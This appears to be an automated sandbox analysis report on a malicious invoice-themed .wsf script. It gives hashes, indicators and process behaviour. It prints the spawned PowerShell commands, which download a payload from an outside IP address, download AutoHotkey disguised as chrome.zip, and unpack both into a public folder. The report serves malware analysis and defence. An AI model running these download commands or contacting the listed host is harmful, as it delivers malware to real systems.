a1ce6b762cb741d0da79d433721258c01cdd1794b00fef95d78e324c07202df2

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
05-06-2024 11:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoice#1136309464.wsf
Size

107KB
MD5

ab87b1030210083dfb5b1e4f11647846
SHA1

c53b4eaece77ca95b11b0facb82fc81af7e6735b
SHA256

5569aaf9f9d3e53647419506c0cb256ac27d7538d2544a7031c2d7d31df0cb58
SHA512

2980941237f69d4ebf380af918144f7a9acef04d7ca195f2e1531e1de6ea2ded17ce0115fd66db5fc7d526397634d22ec80ee33d987f25ca369de0558d672735
SSDEEP

384:qR6cR6cR6cR6cR6cR6cR6cR6cR6cR6cR6cR6wR6cR6cR6cR6cR6cR6cR6cR6cR6N:14JElDTR

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://162.244.210.92:333/kok.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	1948	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3000	powershell.exe
2772	powershell.exe
2556	powershell.exe
2864	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1948 wrote to memory of 3000	1948	WScript.exe	28
PID 1948 wrote to memory of 3000	1948	WScript.exe	28
PID 1948 wrote to memory of 3000	1948	WScript.exe	28
PID 1948 wrote to memory of 2772	1948	WScript.exe	30
PID 1948 wrote to memory of 2772	1948	WScript.exe	30
PID 1948 wrote to memory of 2772	1948	WScript.exe	30
PID 1948 wrote to memory of 2556	1948	WScript.exe	32
PID 1948 wrote to memory of 2556	1948	WScript.exe	32
PID 1948 wrote to memory of 2556	1948	WScript.exe	32
PID 1948 wrote to memory of 2864	1948	WScript.exe	34
PID 1948 wrote to memory of 2864	1948	WScript.exe	34
PID 1948 wrote to memory of 2864	1948	WScript.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#1136309464.wsf"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://162.244.210.92:333/kok.jpg' -Destination 'C:\Users\Public\bbbb.zip'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
06ae91c1cb7f3b9b7179bd2da7f90a19

SHA1
365b9188b90d43e08bfd80c04753189d63582729

SHA256
385c6fd400d581499bd3ce433860163730aff6bf2d8d8aeea8fa152848859d96

SHA512
ecaa800f78bdcaa7808be2822b800cec18e761ef669c222007c72bdd8097659885cfdc03284fef3dd3e402d9f950d622146b49adb232ab25a7b65ecabf91d6bf

Download Submit
memory/2772-20-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2772-21-0x00000000027F0000-0x00000000027F8000-memory.dmp

Filesize
32KB

Download
memory/3000-7-0x000007FEF5E2E000-0x000007FEF5E2F000-memory.dmp

Filesize
4KB

Download
memory/3000-8-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

Filesize
2.9MB

Download
memory/3000-9-0x00000000029F0000-0x00000000029F8000-memory.dmp

Filesize
32KB

Download
memory/3000-10-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/3000-12-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/3000-13-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/3000-11-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download
memory/3000-14-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

Filesize
9.6MB

Download